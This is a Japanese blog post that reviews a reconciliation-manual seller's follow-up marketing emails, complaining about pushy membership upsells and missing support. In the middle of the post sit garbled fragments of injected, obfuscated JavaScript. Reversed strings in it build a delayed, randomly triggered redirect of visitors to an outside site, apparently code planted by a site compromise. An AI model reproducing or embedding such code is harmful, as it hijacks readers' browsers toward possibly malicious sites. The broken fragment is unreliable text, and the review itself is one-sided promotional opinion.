【復縁アドバイザー浅海】復縁マニュアル買った人の体験談プチ会員編

この記事は3分で読めます

復縁アドバイザー、浅海さんの『よりを戻す復活愛!
元カノと復縁する方法』を買ってみました。

 

このページでは、復縁から結婚に成功した”復縁ドッグ”が、

浅海さんの【元カノと復縁する方法】を購入すると送られてくる、

フォローメール”の実態について、辛口レビューしたページです。

今回は、“復縁プチ会員”について書いていきます。

(怒`・ω・´)ハジメカラ ムキッ

 

 

20回の特別メール講座は、とっくに終わっているのですが、

浅海さんからは、時折メールが届くのです。

(。-`ω-)ンー

 

その実物がこちらです。↓

w01

 

 

大体こんな感じのメールは、月に1回くらい届きます。

このメールでは、もう復縁のアドバイス的な内容は、

一切書いてなく、復縁プチ会員への勧誘が簡単に書かれていました。

ハイハイ マタデスカ(´。` ) =3

 

 

 

浅海さんの、復縁プチ会員を知らない人の為に、

説明しますと、浅海さんのマニュアル購入者限定で、

毎月5250円で、下記の特典を受けることができるサービスです。

( ´_ゝ`)フーン

サービス① →過去5年間、実際に相談を受けてきた相談実例を見ることができる。

サービス② →これまでは1回限りだった無料相談を再度受けることができる。

サービス③ →マニュアルだけではカバーしきれなかったケースの復縁方法に関しても、これまでの事例を元にアドバイスしもらえる。

サービス④ →プチ会員の方のみ読むことのできる特別メルマガを読むことができる。

 

 

 

毎月5250円を出せる人はいいかもしれませんが、

マニュアルを買うので精一杯で、この金額を出せない人も多いと思います。

(・A・)イクナイ!!

 

 

 

実際に、メールに書かれていたURLにアクセスしてみました。↓

w02

一番上にカウントダウンタイマーがセットされています。

あおりを入れてきてますね。↓(゚c_゚`;)ナンダヨ、ソリャ!!

w03

もう少し下に進んでみましたが、締め切りもしっかり書いてあります。↓(´<_` )流石だな

w04

 

このプチ会員自体は、そこまで批判するつもりはないのですが、

やっぱり、メールサポートには不満が残ります。

川・ε・川 チョームカツクー!!

 

7stepと復縁ガイドブックは、

メールサポートを実際に使うことができたのですが、

浅海さんのサポートだけは、いまだに受けられていません。

ε=(。・`ω´・。)プンスカプン!!

 

 

 

こちらはサポート専用ページの画像ですが、

相変わらず、こんな調子です。↓

w05

w06

 

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px dotted #460e44; background-color: #e7e7eb;”>

セールスページでは、回数の制限なんて

書いていなかったにも関わらず、実際購入してみたら、

1回限りのメールサポート。

f06

しかも、購入から何ヶ月も経っているのに、

その1回ですら、サポートを受けられていません。

 

セールスページでの約束を守っていないのに、

プチ会員でのメールサポートは本当にしてもらえるのですかね?

(??益?)ゴルァ!!

 

そんな疑問を残しつつ、このサイトを閉じましたが、

小澤さんからも、同様にメールが届くのですが、

浅海さんのような、追加の商品への勧誘なんかしてきません。

 

 

そればかりか、数日に1回のペースで、

復縁のテクニックなどが、しっかり書いてあるメールが

送られてくるんです。

o(●´ω`●)oわくわく♪

 

 

もう、2~30通は送られてきてますよ。

こういったところも、7stepの誠実さが見てとれますよね。

 

あまり、7stepを褒めすぎるもの、

小澤さんの回し者だと思われてしまいますので、

このあたりで、止めたいと思います。

ヽ(●゚´Д`゚●)ノ゚。ウワァァァン!

 

でも、これが複数のマニュアルを比べることができる

復縁ドッグの素直な感想です。

 

マニュアルはいいのに、本当に残念なんですよね。

また、変な動き、良い動きがありましたら、アップしてい予定ですので、

マニュアルレビューをご覧いただいていない方は、見といてくださいね。

 

復縁ドッグ

→【復縁アドバイザー浅海】復縁マニュアルレビュー

  • このエントリーをはてなブックマークに追加

関連記事

コメント

  1. この記事へのコメントはありません。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座